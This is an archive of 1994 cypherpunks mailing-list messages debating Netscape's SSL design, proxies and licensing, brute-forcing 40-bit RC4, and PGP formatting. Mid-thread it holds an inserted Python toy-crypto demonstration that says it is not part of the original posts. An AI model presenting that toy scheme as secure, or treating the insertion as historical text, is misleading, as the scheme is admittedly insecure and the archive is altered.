care less about the server if I can verify that > I've got the right document in response to my query. 
Similarly, if I send the > contents of a form containing, say, my Amex number, I want to encrypt the > session key with the public key of the merchant, not the service provider. I believe that these properties of document security are orthogonal to transport security. Today we have bit off transport security. Using MIME multipart encoded documents, document security can be handled as well. There already exist standards defining the format for these (PEM etc.), all that is missing is a browser that adheres to them, and some server based tools for creating them. SSL combined with those provides a powerful solution to todays Internet problems (jeesh, now *I'm* starting to sound like a marketing person :) > This is what I (and many others) mean by an "end to end security model." > Transport security is a nice secondary ability (it helps defend against > traffic analysis, for example, and casual snooping by students with packet > sniffers), but without end-to-end security, it's simply a way of providing a > false sense of security. I wouldn't want to do away with the TCP checksum > field simply because the modem I use for my SLIP link is "error-correcting," > and I feel the same way about security. Agreed. However, today, we consider it a primary concern instead of a secondary concern. To do business on the Internet, people will be filling in forms and submitting data that is sensitive to server operators. We don't want that data to be observered in transit. Data that is paid for should also be private. > > I put my email address in there for that very reason. Jeesh. > > I'd rather that technical feedback occur in a public forum like the IETF. > I have no pretensions about being a security expert, and I want people to > shoot down my bad ideas too. Heck, I *like* having my competitors tell me > what's wrong with my ideas :). I tend to agree here, but before I open something up to wide discussion I prefer to have a smaller group doing the review work. 
After the small group work has been done, then a larger review follows. > > > This serves as a direct barrier to competition from other commercial > > > vendors. > > > This is an outright lie. We don't use TIPEM. You could build a > > conformant SSL implementation using RSAREF and the freeware IDEA > > cipher code. > > Nope, not if I want to sell it (note the word "commercial" in my comment). > RSAREF cannot be used for commercial software, nor can IDEA under the PGP > license. There is no feasible way to license the RSA patents for commercial > use except by licensing TIPEM. I have been told this outright by Kurt > Stammberger of RSADSI (their VP of marketing, I believe). This is not > secondhand information. All commercial software that I know of using RSA > public key encryption and RSA stream ciphers (such as RC2 and RC4) uses TIPEM > and BSAFE, including Lotus Notes and Apple PowerTalk. RSA's royalty structure > is based on a percentage of revenue, with the percentage on a sliding scale > based on gross corporate revenue (not just on products which use RSA's > patents). If you keep your margins low to compete in the marketplace, you > lose. Even you folks are making your money on high-margin products (servers) > rather than low-margin ones (clients), I'd wager at least in part because it's > a way to make money despite having to pay RSA royalties. I think RSA pulled a fast one on you. We don't use TIPEM. We wrote the X.509 handling code ourselves and have tested it for interoperability. In any case, there are two classes of net consumers out there: the academia and corporation. The academia can almost always get access to source code for free and reuse it interesting manners with little trouble, as long as it's academic. Us business types get stuck paying for everything (of course we make a living that way too...). It doesn't bother me that people would have to license RSA technology to implement SSL commercially. 
We did, and in some sense it levels the playing field. However, in defense of SSL, I must say that there is no strict requirement for RSA technology. A careful reading of the spec will lead one to discover that different public-key technologies can be used. Since certificates are typed, and standard X.509 certificates include algorithm identifiers, it is possible to implement a different authentication mechanism that doesn't use RSA technology. For example, to choose some popular choices (:^), one could use SHS instead of MD5, skip-jack instead of RC2/RC4/IDEA and some other freely available public key algorithm. > The RSAREF license has been loosened up some recently, but it's still > restricted to freeware. > > > As for a barrier to competition. So what else is new? We > > all have barriers to overcome before we can compete. Should we get rid of > > TCP/IP as a barrier to using the web? > > I don't have to pay royalties to sell an implementation of TCP/IP. Your > analogy fails. My point was that in order to even play on the internet, one needs a computer, a network connection, and TCP/IP, *PLUS* all of the various software that one wishes to use to communicate. This is not free. It is being paid for by you whether you do it directly, or it is built into the margins of the hardware manufaturer that sold you the machine. > > You are somewhat right here. In fact, this was done because we are a company > > interested in surviving long enough to withstand the eventual attack > > by microsoft. > > You've already got your eggs in the right basket on this one--sell servers and > services, not client software. Microsoft has a miserable track record in the > server arena (witness the underwhelming success of Windows NT :)). It's also > less of a commodity market, which is where Microsoft excels (no pun intended). 
> > > As a result we received critical review > > from some decent members of the crypto community, including: > > > > Martin Abadi > > Mike Burrows > > Alan Schiffman > > Matt Robshaw > > Burt Kaliski > > Mostly RSADSI people, by my count. Great technical background, but I wouldn't > call relying on one of your technology vendors "peer review"... Actually, 2 people from DEC, one from EIT and 2 from RSA. > > As for the IETF standards process, we are pushing the > > document into the RFC process. > > Precisely. Rather than working with others in the industry and research > communities, you are trying to push your proposal into the standards track. I'm listening! What is wrong with SSL? What defects does it have in the way that it tries to solve privacy and authentication? What should we do to make the next version better? -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From skaplin at skypoint.com Mon Dec 12 15:45:52 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 12 Dec 94 15:45:52 PST Subject: Remailer and gateway list Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Can someone please provide me with a list of all of the current remailers and mail -> usenet gateways? Thanks, Sam ============================================================================== The release of atomic energy has not created a new problem. It has merely made more urgent the necessity of solving an existing one. - Albert Einstein ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. 
==============================================================================

From raph at netcom.com Mon Dec 12 16:01:07 1994
From: raph at netcom.com (Raph Levien)
Date: Mon, 12 Dec 94 16:01:07 PST
Subject: Time to exhaustively break 40-bit RC4?
Message-ID: <199412122330.PAA29185@netcom20.netcom.com>

The SSL documents say that exhaustively searching 40 bits of RC4 keyspace takes 64 MIPS-years. When I brought this figure up at the cpunks meeting, it was roundly derided. However, I think it might be a sound estimate.

The key schedule operation in RC4 does 256 "swap" operations. Let's say it takes four instructions to do each swap. So, it's 2000 instructions per key. A one-MIPS processor can search 500 keys a second. There are about 30 million seconds in a year, so that's 15 billion keys a year. 40 bits is a trillion keys, so it works out to 66 years, which is well within the Pentium-style accuracy of the calculations I've done. Am I missing something here?

On the second floor of Soda Hall are about 100 HP Snake workstations. I think they're about 100 MIPS each. During the winter break, they will be sitting mostly unused. If the math checks out, they should be able to search keyspace in two and a half days. Anyone wanna do some cracking?

Raph

From kipp at warp.mcom.com Mon Dec 12 16:02:12 1994
From: kipp at warp.mcom.com (Kipp E.B.
Hickman) Date: Mon, 12 Dec 94 16:02:12 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122322.AA11307@snark.imsi.com> Message-ID: <9412121600.ZM17661@warp.mcom.com> On Dec 12, 6:22pm, Perry E. Metzger wrote: > Subject: Re: Clarification of my remarks about Netscape > > "Kipp E.B. Hickman" says: > > Clearly you and I disagree on a fundamental point. Which is more > > important? Securing the document or securing the transport of the > > document. I believe that today's problem for commerce is securing > > the transport. > > I believe there is a fundamental problem of understanding here -- it > does not seem that you understand how store and forward email > works. Securing just the transport is less than useless. SSL does not provide solutions for the class of problems elucidated by store-and-forward mail systems. However, it does promise that the transmission between two mail agents will be private. Depending on the configuration of your network this may be all you need. Using SSL to "privatize" SMTP transmissions seems useful to me. If the data being transmitted were PEM then all the better. > > Solving this currently widespread problem makes the > > Internet a friendlier place for commerce. It allows sensitive > > information to be transported privately. > > No, it does not -- it just means that some links can't be read. On the > other hand, PEM/MIME-PEM *ALREADY* keep people from reading no matter > whether the link is open or not open. > > > Let's pretend for a moment that you are right. IPSP is the way to > > go, today, and that silly us, we should have used it. So now I go to > > my site manager, and say: > > > > Please replace all that fancy expensive network hardware with new > > ones that speak IPSP so that we can do private communications with... > > You don't have to replace any hardware. More ignorance on your part. Something somewhere has to be able to speak IPSP. Something must be changed, even if it's just software. 
If it is just software, then I have an upgrade problem because in our network we have one machine from every workstation manufacturer and every kind of PC and MAC imaginable. This is not uncommon, and is a logistics nightmare.

Once a service is relegated to only allowing private communications, you are just as stuck as we are. There will be a class of hardware/software that cannot communicate. This upgrade problem exists no matter what security technology is used.

>
> > So who can I talk to? Name one router that speaks the secure
> > protocols you are documenting?
>
> Each and every one routes it today. I have routed swIPe packets
> over the commercial internet -- and of course I couldn't control any
> of the intervening routers. Your comments indicate that you are
> totally unaware of how IPSP is designed to work.
>
> You are ignorant and foolish. You could at least read a document or
> two before making statements that make you sound stupid. I read your
> documents. You could at least read other peoples -- but that would
> naturally require that you even realize that other people have done
> work on this topic.

I believe your tone here is less than helpful :-(. You weaken your position by being insulting instead of sticking to the facts.

> > > Even were transport layer security needed, there are many other
> > > protocols for doing the exact same thing -- your solution is hardly
> > > new or interesting. Why not use an existing one instead of rolling Yet
> > > Another One? Of course, as I've repeatedly mentioned, network layer
> > > security is being used by many people today and will be standardised
> > > very soon -- probably before SSL.
> >
> > We never claimed the solution was new or interesting. However, it is a
> > solution.
>
> Yet Another Solution. Why not invent your own internet protocol? After
> all, it would be a "solution".
>
> > You must have missed a line in the spec:
> >
> > #define SSL_CK_RC4_WITH_MD5 0x01
> > #define SSL_CK_RC4_EXPORT40_WITH_MD5 0x02
> > #define SSL_CK_RC2_CBC_WITH_MD5 0x03
> > #define SSL_CK_RC2_CBC_EXPORT40_WITH_MD5 0x04
> > #define SSL_CK_IDEA_CBC_WITH_MD5 0x05
>
> Gee, I was under the impression that that was CODE, not SPEC.

Another helpful response :-(

> > Not true. Distinguished names can be bulky, but you don't have to
> > use them that way.
>
> What other way could you use?

I would do one of two things:

1. Define a conventional way to use the DN (pick a subset like RFC1485 does).
2. Extend the set of attribute types supported by a DN.

> > They can be made to map into DNS names trivially,
>
> How? Name a single methodology.
>
> > Please define a solution that is:
> >
> > distributed
> > reliable
> > supports an unforgeable name to public-key mapping
> > standard
> > not-bulky
> > not-expensive
> >
> > I will be the first to sign up and buy one. The market exists.
>
> Use DNS for key distribution. Use IPSP (soon to be standardized -- SSL
> isn't standard either) for the packet layer. Use some variant of
> Photuris for key distribution. All the software in question is
> publicly available or will be and will run on a wide variety of
> platforms.

Please provide a reference for "Photuris". The web crawler couldn't find it.

--
---------------------------------------------------------------------
Kipp E.B. Hickman
Netscape Communications Corp.
kipp at mcom.com
http://www.mcom.com/people/kipp/index.html

From adam at bwh.harvard.edu Mon Dec 12 16:14:20 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 12 Dec 94 16:14:20 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121532.ZM17644@warp.mcom.com>
Message-ID: <199412130014.TAA21734@bwnmr5.bwh.harvard.edu>

Kipp E.B. Hickman writes:

| I'm listening! What is wrong with SSL? What defects does it have in the way
| that it tries to solve privacy and authentication?
What should we do to make | the next version better? The first thing you need to do is define a threat model. Make explicit your assumptions. What needs to be trusted, and when? Who are your threats? What are your assets, and what are they worth? Next, you should publish the model, and let us rip it into little shreds. This is hard on the ego, but good for your threat model. No one ever thinks of everything. Iterate here. This is where the time & effort belong. Once you have a solid threat model, you should see what protocols and tools are out there that can be used to defend against those threats. I suspect that most of the tools you will find you need exist. Some will not. Having found what wheels don't need to be invented, you need to code your solutions. Then you need to publish that code to allow the security community to decide whether or not to trust it. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jrochkin at cs.oberlin.edu Mon Dec 12 16:15:08 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 12 Dec 94 16:15:08 PST Subject: extra dashes in PGP-related blocks? Message-ID: At 5:03 PM 12/12/94, Andrew Brown wrote: >but is a remailer (or pgp) smart enough to take the output from checking >a signature and run pgp over it again? is it going to know to take something >and pass it through pgp until pgp can't do anything with it any more? i think >that's the problem that jrochkin was addressing. he has a pgp encrypted >message and then signs it and then wants to mail it to a remailer so that the >remailer can decrypt the message but it won't ecause the encryption is >nested... > >wasn't that it? Well, no, not really. My problem was that a user would send me their public key, inside of a signed message, and the "BEGIN PUBLIC KEY" stuff would have the "- " on it. 
Which means that before I can add it to my keyring, I've got to edit out the extra "- "s, and then save it in a file, and then pass it through PGP, instead of just passing the original message through PGP, or using the Mac "copy" command on a part of the message and sending that through PGP. Or someone sends me an encrypted address block inside a signed message, and I've got to do the same before I can use it.

I now understand why PGP does what it does, but it's still a pain. Perhaps the ideal mail reading program would run my incoming mail through PGP before I even saw it, so I wouldn't have this problem. Well, actually not. My ideal mail reader would check the signatures before I saw them, but would also leave them intact on the message, so I could re-check them myself manually if I wanted. Oh well. It's not a limitation on functionality of any kind, just on convenience.

From perry at imsi.com Mon Dec 12 16:32:34 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 12 Dec 94 16:32:34 PST
Subject: Time to exhaustively break 40-bit RC4?
In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com>
Message-ID: <9412130031.AA11399@snark.imsi.com>

Raph Levien says:
> The SSL documents say that exhaustively searching 40 bits of RC4
> keyspace takes 64 MIPS-years. When I brought this figure up at the
> cpunks meeting, it was roundly derided. However, I think it might be a
> sound estimate.

It's not a question of deriding the estimate...

> If the math checks out, they should be able to search keyspace in
> two and a half days.

...it's a question of deriding the security of any system that takes so little time to crack, and that's assuming there are no better attacks than brute force (yet to be determined).

With optimization, you can do even better than that. With a little bit of hardware (not very much) you can crack open a 40 bit keyspace with the effort normally reserved for opening your bathroom door in the morning.
Perry From kipp at warp.mcom.com Mon Dec 12 16:33:34 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 16:33:34 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122118.AA11047@snark.imsi.com> Message-ID: <9412130027.AA17715@warp.mcom.com> In article <199412122229.OAA05451 at jobe.shell.portal.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > "Perry E. Metzger" writes: > > >HTTP, like SMTP, is only a transport for underlying documents. The > >underlying documents are the things people wish to secure, not the > >transport layer. By securing only the transport, you make it possible > >for people to get pages that are forged, although they can be sure of > >what machine delivered them (which isn't significant). Your system is, > >for instance, useless in a proxy HTTP daemon environment. > > I was going to say that an SSL-aware proxy daemon could play "man in > the middle" and pass through the SSL handshaking messages which occur > at connection time, so that the user client could authenticate the > remote server, then communicate using a key shared with that server but > which the proxy would not know. > > But that won't work with SSL, I guess. The SSL handshaking goes on > before any message data has been exchanged; in particular, before the > URL is sent to the proxy to tell it what server to connect to. (Hiding > URL's is one of the features of SSL.) So in fact with SSL the only > authentication possible is between proxy and user, and then between > proxy and remote server. There doesn't seem to be a place in the > protocol where the user could authenticate the remote server and create > a key which would not be known to the proxy. This does seem to be a > deficiency. First, let me clarify slightly. The only place where a problem occurs currently is if the server is attempting to authenticate the client. 
Because the proxy agent cannot reliably act as an agent for a client, it cannot properly answer a server's authentication requests.

I can imagine several solutions to this thorny problem:

1. Client connects securely to a proxy agent using SSL. Upon establishment of the secure connection, the request is transmitted to the proxy. If the request is to a secure document (the proxy can tell by examining the URL) (and the client can tell), then the client re-enters the SSL handshake protocol from the start and the proxy agent turns into a data forwarder ala sockd. This is technically a change to the proxy protocol, but requires no change to the SSL protocol. Of course, to teach proxies about security requires *some* change...

2. The client connects insecurely to a proxy agent using current methods. The client requests a secure document. The proxy agent connects to the secure server using SSL and attempts to act as the client's agent in the transaction. Note that the user must consider this an insecure connection, and trust it only as far as she/he trusts the proxy server. Most of the time, the proxy will work. However, when client authentication is performed, the proxy fails as it should. If one were to construct a "trusted" proxy, then in theory it could perform the client authentication, acting as an agent for the client. However, this seems kinda scary to me, so I can't say I recommend it. To do this would require the client to transmit its authentication information to the proxy agent, which seems like a really bad idea.

3. SSL has a notion of a "security escape" of which there are currently no applications. One could define a security escape to allow enveloping of the authentication information needed by the final server so that the client can properly respond to authentication requests. I haven't thought this thru yet.
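Options 1 and 2 from the message above, modelled as an added example that is not part of the original post and is not SSL itself. A toy Diffie-Hellman exchange and hash-based record protection stand in for the SSL handshake and record layer, and every class, function and parameter name is an assumption of this example.

```python
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman group standing in for the SSL key exchange.
# Demonstration parameters chosen for this example only; not secure.
P = 2**255 - 19
G = 2


def _derive(key, label):
    """Separate encryption and MAC keys from one session key."""
    return hashlib.sha256(label + key).digest()


def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """Encrypt-then-MAC one record: nonce || ciphertext || tag."""
    nonce = secrets.token_bytes(12)
    stream = _keystream(_derive(key, b"enc"), nonce, len(plaintext))
    ct = bytes(a ^ b for a, b in zip(plaintext, stream))
    tag = hmac.new(_derive(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key, record):
    """Verify the tag, then decrypt; a modified record raises ValueError."""
    nonce, ct, tag = record[:12], record[12:-32], record[-32:]
    good = hmac.new(_derive(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, good):
        raise ValueError("record failed integrity check")
    stream = _keystream(_derive(key, b"enc"), nonce, len(ct))
    return bytes(a ^ b for a, b in zip(ct, stream))


class Party:
    """An endpoint whose public value plays the role of its certified key."""

    def __init__(self):
        self.priv = secrets.randbelow(P - 2) + 1
        self.pub = pow(G, self.priv, P)

    def session_key(self, peer_pub):
        shared = pow(peer_pub, self.priv, P)
        return hashlib.sha256(shared.to_bytes(32, "big")).digest()


class Server(Party):
    def __init__(self):
        super().__init__()
        self.last_peer = None  # public key the server actually authenticated

    def handle(self, peer_pub, record):
        key = self.session_key(peer_pub)
        request = unseal(key, record)
        self.last_peer = peer_pub
        return seal(key, b"OK " + request)


class Proxy(Party):
    def __init__(self, server, tamper=False):
        super().__init__()
        self.server, self.tamper, self.seen = server, tamper, []

    def forward(self, client_pub, record):
        """Option 1: blind data forwarder; it relays bytes it cannot read."""
        self.seen.append(record)
        if self.tamper:  # flip one ciphertext bit in transit
            record = record[:12] + bytes([record[12] ^ 1]) + record[13:]
        return self.server.handle(client_pub, record)

    def terminate(self, client_pub, record):
        """Option 2: proxy ends the client's session and opens its own."""
        request = unseal(self.session_key(client_pub), record)
        self.seen.append(request)
        upstream = self.session_key(self.server.pub)
        reply = unseal(upstream,
                       self.server.handle(self.pub, seal(upstream, request)))
        return seal(self.session_key(client_pub), reply)


def fetch_via_forwarder(client, proxy, request):
    key = client.session_key(proxy.server.pub)  # keyed to the origin server
    return unseal(key, proxy.forward(client.pub, seal(key, request)))


def fetch_via_agent(client, proxy, request):
    key = client.session_key(proxy.pub)  # keyed to the proxy only
    return unseal(key, proxy.terminate(client.pub, seal(key, request)))


if __name__ == "__main__":
    client, server = Party(), Server()
    for name, fetch in (("forwarder", fetch_via_forwarder),
                        ("agent", fetch_via_agent)):
        proxy = Proxy(server)
        fetch(client, proxy, b"card=CONSTRUCTED-0000")
        print(name, "proxy saw plaintext:",
              b"card=CONSTRUCTED-0000" in proxy.seen,
              "| server authenticated client:", server.last_peer == client.pub)
```

In the forwarder case the server authenticates the client's own key and the proxy holds only ciphertext; in the agent case the proxy reads the request and the server sees the proxy's key, which is why client authentication through such a proxy fails.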

From db at Tadpole.COM Mon Dec 12 16:34:24 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 16:34:24 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121357.ZM17505@warp.mcom.com>
Message-ID: <9412130033.AA12133@tadpole.tadpole.com>

"Kipp E.B. Hickman" says:
> If you would like we can send you some brochures for our
> products in that area.
>

Ah, it doesn't work with existing proxies, so we have to pay you. Whether it is your true motivation or not, this apparent attempt to create a market for proprietary goods by disrupting standards is at the core of the bad odor that your company is giving off these days.

Not to mention the arrogance:

> Secondly, SSL is not an end, but a beginning. Instead of waiting 10 more years
> before the standards process gets around to inventing some old technology and
> codifying it, we have put something out. We have made the protocol public
> instead of proprietary and we have asked for critical review. Not griping.
>

I'm the first one to agree that even the IETF _can be_ slow and cumbersome. But it is a far cry from typical standards bodies (e.g. ITU, which I've had to deal with recently) in that it is very easy to participate, the standards are freely available, and the process moves fairly rapidly, especially by comparison.

If you want to try to answer "what is the Internet?", more than anything else it is a set of _standards_ for doing things in a network of networks. When you declare standards changes by fiat _without even an attempt_ to work with others (formally or informally) you are going to irritate not just your competitors but your potential customer base (which I'm a part of.)

As a corporate culture, you folks from Netscape seem to project a sense of arrogance and disregard for the net culture that is extremely irritating.
And this is from someone who basically _likes_ your product, and has happy users using it, although I've bumped up the priority of checking out the other commercial offerings in this area because of your arrogance and total disregard for even pro-forma cooperation with the standards process.

I'd also like to point out that, more often than not, attempts to create proprietary "standards" by fiat don't work. To wit, look at Microsoft's various attempts at networking. This company has billions, and it ends up announcing, as a great "innovation" that it is (finally) going to support TCP/IP in a meaningful way, despite numerous abortive attempts at other "standards".

You point to some other technical areas where frustrated manufacturers split off and extended standards, but I think you'll find in almost every case that it was _after_ they had hit meaningful roadblocks with their proposed standard, and that they worked diligently to ensure compatibility amongst themselves and others offering the new level of technology. Given the history of your company, and the attitudes displayed here, I question whether this will happen with your hacks^H^H^H^H^Hextensions.

Doug

From kipp at warp.mcom.com Mon Dec 12 16:40:23 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Mon, 12 Dec 94 16:40:23 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412130033.AA12133@tadpole.tadpole.com>
Message-ID: <9412121638.ZM17746@warp.mcom.com>

On Dec 12, 5:51pm, Doug Barnes wrote:
> Subject: Re: Clarification of my remarks about Netscape
>
> "Kipp E.B. Hickman" says:
> > If you would like we can send you some brochures for our
> > products in that area.
> >
>
> Ah, it doesn't work with existing proxies, so we have to pay
> you. Whether it is your true motivation or not, this
> apparent attempt to create a market for proprietary goods by
> disrupting standards is at the core of the bad odor that your
> company is giving off these days.

You are right.
It doesn't work with existing proxies. But existing proxies can't do secure data transfers, so what's your point?

> Not to mention the arrogance:
>
> > Secondly, SSL is not an end, but a beginning. Instead of waiting 10 more years
> > before the standards process gets around to inventing some old technology and
> > codifying it, we have put something out. We have made the protocol public
> > instead of proprietary and we have asked for critical review. Not griping.
> >
>
> I'm the first one to agree that even the IETF _can be_ slow and
> cumbersome. But it is a far cry from typical standards bodies
> (e.g. ITU, which I've had to deal with recently) in that it is
> very easy to participate, the standards are freely available,
> and the process moves fairly rapidly, especially by comparison.
>
> If you want to try to answer "what is the Internet?", more than
> anything else it is a set of _standards_ for doing things in
> a network of networks. When you declare standards changes by
> fiat _without even an attempt_ to work with others (formally
> or informally) you are going to irritate not just your competitors
> but your potential customer base (which I'm a part of.)
>
> As a corporate culture, you folks from Netscape seem to project
> a sense of arrogance and disregard for the net culture that is
> extremely irritating. And this is from someone who basically
> _likes_ your product, and has happy users using it, although I've
> bumped up the priority of checking out the other commercial
> offerings in this area because of your arrogance and total
> disregard for even pro-forma cooperation with the standards process.
>
> I'd also like to point out that, more often than not, attempts
> to create proprietary "standards" by fiat don't work. To wit,
> look at Microsoft's various attempts at networking.
> This company has billions, and it ends up announcing, as a great
> "innovation" that it is (finally) going to support TCP/IP in a
> meaningful way, despite numerous abortive attempts at other
> "standards".
>
> You point to some other technical areas where frustrated
> manufacturers split off and extended standards, but I think
> you'll find in almost every case that it was _after_ they
> had hit meaningful roadblocks with their proposed standard,
> and that they worked diligently to ensure compatibility
> amongst themselves and others offering the new level of
> technology. Given the history of your company, and the
> attitudes displayed here, I question whether this will
> happen with your hacks^H^H^H^H^Hextensions.

Seems like your mailer was having some difficulty :-)

In any case, my personal opinion is that NCOM is being attacked with a catch-22. If we had kept the protocol proprietary, then we would have been shot. We went public with it and are getting shot. If we had waited the 2.5 years to develop it, as a few here would seem to be advocating, then the market would shoot us.

Nice place to live.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com            http://www.mcom.com/people/kipp/index.html

From turner at telecheck.com Mon Dec 12 16:45:58 1994
From: turner at telecheck.com (Joe Turner)
Date: Mon, 12 Dec 94 16:45:58 PST
Subject: Real-time surveillance of the police
In-Reply-To: <199412122252.OAA05139@netcom19.netcom.com>
Message-ID: <9412130045.AA05949@TeleCheck.com>

> I have another point of view to add: I don't want to see my local cops
> have all of their actions videotaped and reviewed for quite another
> reason--I don't want a "mechanization" of the enforcement process!

It's already here. It's a show called COPS. My brother (the black sheep) used to watch it quite a bit before he became one (a cop, not a sheep).
More and more police cars here in Texas are becoming equipped with video cameras. Some of the stuff is just unreal, although I prefer the subtle comical tones of one who is under the influence of mind altering substances.

> Forcing the cops to surveill themselves will almost certainly take
> away what enforcement discretion they now have.

Actually, it usually gives them more credibility in court. I had the pleasure of going to court for a traffic violation to try to plead guilty so they would cut the fine in half at the local court house. What I saw amazed me. I saw person after person trying to defend themselves. They had a police officer referring to his notes, while the government's lawyer quickly won every case. He would ask some simple questions such as, what was the color of the car, etc. and the judge would just find the defendant guilty. UNTIL, someone came in with his own lawyer. I asked him why he brought a lawyer and he had apparently received a few too many tickets (DUIs) and could lose his license. Anyway, this case started just as the others had. Poor guy, I thought, he's going to lose his license and have to pay this lawyer too. But then just as soon as the officer started to read from his note pad, his lawyer yelled, "OBJECTION! your honor... *please*". To which the judge replied, "you're right," pointed to the officer and told him to put away the notes. After that, he just jumped all over the officer. He went nuts when the officer said he smelled alcohol on his client and even brought in a chemist to testify on the properties of alcohol (which is odorless). To make a long story short, the guy was guilty, but it was thrown out because of the officer.

I say this because I am tired of hearing about court cases who put the victims on trial rather than the criminals. I would like to see a criminal deny video tape.

[ much omitted..]

Given an effective range of a few miles, your devices must be operating in the 220MHZ + range of freqs (??)
and at relatively low power?

> (A skier lost in the mountains, a child who has wandered away....all
> are cases where the needed bits per second is _much_ less than 1000
> bps. Indeed, most of the localizers are either not sending info at
> all, or very sporadically.)

Actually, if you've ever gone on a fox hunt with some amateur radio buffs you would quickly find a problem with this. I'm sure on more than one occasion a fox-hunter has driven several miles only to find that the signal he is tracking is being reflected off of a building or lake. Although I do recall that there was talk of a cellular telephone company (in Chicago??) was working on a software modification to do essentially this. I don't know if they are doing it now, but I remember some of the details... the three closest repeaters would triangulate your position down to the city block. The police were either very interested or very happy with this... I don't remember which...

--
Joe N. Turner              Telecheck International
turner at telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654      (800) 888-4922 * (713) 439-6597

From ianf at sydney.sgi.com Mon Dec 12 16:46:00 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Mon, 12 Dec 94 16:46:00 PST
Subject: Time to exhaustively break 40-bit RC4?
In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com>
Message-ID: <9412131131.ZM13269@wiley.sydney.sgi.com>

On Dec 12, 3:30pm, Raph Levien wrote:
> The key schedule operation in RC4 does 256 "swap" operations. Let's
> say it takes four instructions to do each swap. So, it's 2000
> instructions per key. A one-MIPS processor can search 500 keys a
> second. There are about 30 million seconds in a year, so that's 15
> billion keys a year. 40 bits is a trillion keys, so it works out to 66
> years, which is well within the Pentium-style accuracy of the
> calculations I've done.

No, because as you're doing an exhaustive keysearch, you can "pipeline" the key generation process in software.
Each key requires 256 swaps, certainly, but there are only two swaps difference between the key for "0000000000" and "0000000001" (assuming a 40 bit key). If you recursively generate keys, then you can generate successive keys like this:

1. Copy the keystate from iteration n-1 (keep the partial keystates on a stack).

2. Do the swap for this portion of the key, and for 255 out of 256 keys, you will have a new one in 2 swaps.

(In reality, it would be faster to undo the last swap rather than copying the key, and keeping the swaps on a stack rather than the keystate on a stack. These are implementation issues I haven't given a huge amount of thought to as yet.)

Unless there is some hidden complexity which I have overlooked - in which case I will be delighted to stand corrected - this will produce a key fast enough to allow an average workstation to search the 40-bit keyspace using a known plaintext attack in a couple of hours or less. If this is the case, 40-bit RC4 might as well be crypt(1), and 48-bit RC4 looks pretty shaky too.

I was planning to code this over the xmas break, dependent on whatever other commitments fall on me during that period. I realised it was possible a couple of months ago after pondering ways of parallelising the RC4 key generation process in hardware.

Ian.

From andrew at riskdev.ml.com Mon Dec 12 16:59:34 1994
From: andrew at riskdev.ml.com (Andrew Brown)
Date: Mon, 12 Dec 94 16:59:34 PST
Subject: extra dashes in PGP-related blocks?
In-Reply-To: <9412122245.AA17251@hodge-podge.MIT.EDU>
Message-ID: <9412130059.AA07996@nottingham.riskdev.ml.com>

-----BEGIN PGP SIGNED MESSAGE-----

>> From: Jonathan Rochkind
>
>My problem was that a user would send me their public key, inside of a
>signed message, and the "BEGIN PUBLIC KEY" stuff would have the "- " on it.
>Which means that before I can add it to my keyring, I've got to edit out
>the extra "- "s, and then save it in a file, and then pass it through PGP,
>instead of just passing the original message through PGP, or using the Mac
>"copy" command on a part of the message and sending that through PGP.
>Or someone sends me an encrypted address block inside a signed message, and
>I've got to do the same before I can use it.

but wait! you can't actually verify the outer sig until you extract the key from inside the signed message? that's a bit more complicated. pgp will actually recognize a key embedded inside an armored, signed message but it won't (i don't think -- warlord?) play with the key other than tell you it is one.

what these people should probably be doing is signing their public keys with their private keys to provide the same functionality (almost). what you have, otherwise, really is a two step process. you will have to strip off the outer sig layer to get the key.

>I now understand why PGP does what it does, but it's still a pain. Perhaps
>the ideal mail reading program would run my incoming mail through PGP
>before I even saw it, so I wouldn't have this problem. Well, actually not.
>My ideal mail reader would check the signatures before I saw them, but
>would also leave them intact on the message, so I could re-check them
>myself manually if I wanted. Oh well. It's not a limitation on
>functionality of any kind, just on convenience.

i believe if you used emacs to read your mail, you might get that sort of functionality since it's very user-customizable (is that a word?). i wrote myself a little perl wrapper to handle signing/encrypting outbound messages so that i don't have to type all the options and redirect the output or move output files. it's a one person thing. to each his own. i prefer to read my mail in a very un-adulterated form and i do all my sig verifying and decrypting by hand too. i'm weird that way.
apologies to warlord, you are right (imho) about the fundamental behavior of remailers. they shouldn't do things like that except perhaps attempt to remove the outer armor layer if it is an encrypting/decrypting remailer.

peas and goobles!

- --
- --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown)
Phone: 1.212.449.0088 Fax: 1.212.449.8612
